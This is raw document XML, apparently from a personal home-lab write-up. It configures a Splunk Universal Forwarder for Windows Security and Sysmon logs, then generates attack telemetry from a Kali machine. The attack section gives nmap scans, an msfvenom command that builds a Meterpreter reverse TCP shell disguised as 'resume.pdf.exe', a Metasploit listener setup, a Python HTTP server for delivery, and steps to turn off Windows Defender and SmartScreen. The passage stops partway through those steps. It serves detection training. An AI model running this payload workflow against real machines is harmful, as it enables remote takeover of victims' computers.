        <w:t xml:space="preserve">#disabled = 0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#index = wineventlog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[WinEventLog://Security]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">disabled = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index = wineventlog</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#[WinEventLog://System]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#disabled = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#index = wineventlog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[WinEventLog://Microsoft-Windows-Sysmon/Operational]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">disabled = false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">renderXml = true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index = sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sourcetype = XmlWinEventLog:Microsoft-Windows-Sysmon/Operational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0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this project, I configured the UF to collect Windows Security Events Log and Sysmon Log only, that’s why the other events logs are being commented, but you can always enable them if you want.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: If you use this configuration, you should create a new index called “sysmon” and “wineventlog” in Splunk, or else you won’t see any logs display on the screen. If you don’t want to configure it, delete the line “index” name in every section of the above configuration.</w:t>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Open a PowerShell or CMD terminal, restart Splunk UF to start sending logs data, make sure the output destination is correct. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PS C:\Program Files\SplunkUniversalForwarder\bin&gt; .\splunk.exe restart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t xml:space="preserve">With everything set, you can go to the Splunk homepage to start monitoring logs, go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search and Report </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and check whether or not Splunk have successfully collected logs. If you don’t see any logs display, try to restart splunk with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /opt/splunk/bin/splunk restart.</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731200" cy="2946400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="29"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731200" cy="2959100"/>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5731200" cy="2667000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_swleqzmw8i2y" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Attacking and Telemetry Generation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali machine, conduct a nmap scan toward the Windows machine using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -A -Pn &lt;Target_IP&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sS -p 1-10000 &lt;Target_IP&gt; -v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Enables aggressive scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Skips host discovery phase.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="4000500"/>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924300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You would see that port 3389, which is the port used for RDP connection, is available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: You will need to enable RDP on the windows machine first before performing port scan in order to see the above results. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware Execution with MSFVenom</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34"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Kali machine terminal, we will use msfvenom to create a reverse TCP shell payload with command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=&lt;Kali_IP&gt; LPORT=4444 -f exe -o resume.pdf.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: signaling what payload we want and its respective filepath (windows/x64/meterpreter/reverse_tcp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST=&lt;Kali_IP&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : the destination we want the payload to connect back to - replace Kali IP with the actual IP that your Kali VM is using.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT=4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : THe local port that the attacker’s machine uses to listen for connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : specifies the format of the output file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o resume.pdf.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : the name of the output file.</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use any other name other than “resume”.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2654300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up a Listener with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we will open Metasploit using msfconsole and choose the multi-handler.</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731200" cy="3543300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will need to configure the payload to match our malware using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to set other parameters.</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731200" cy="3543300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="27"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21"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the payload with command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> set payload windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After that, set lhost to the Kali IP with command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set lhost 192.168.17.130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="4089400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, start the handler to listen for incoming connections.</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4524375" cy="371475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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5243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Set up HTTP Server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali machine, use Python to setup a simple HTTP server. Open terminal and run the following command:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> python3 -m http.server 9999</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">this will start a HTTP server at port 9999 for other machine to access it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-m tells Python to run a library module as a script “http.server”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9999 is the port the HTTP server will use to listen for request.</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Running malware on the Windows machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this lab to be successful, I disabled Windows Defender on the Windows machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can disable it by go to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, navigate to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">App &amp; Browser Control, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and Turn off SmartScreen for Apps.</w:t>
      </w:r>
    </w:p>
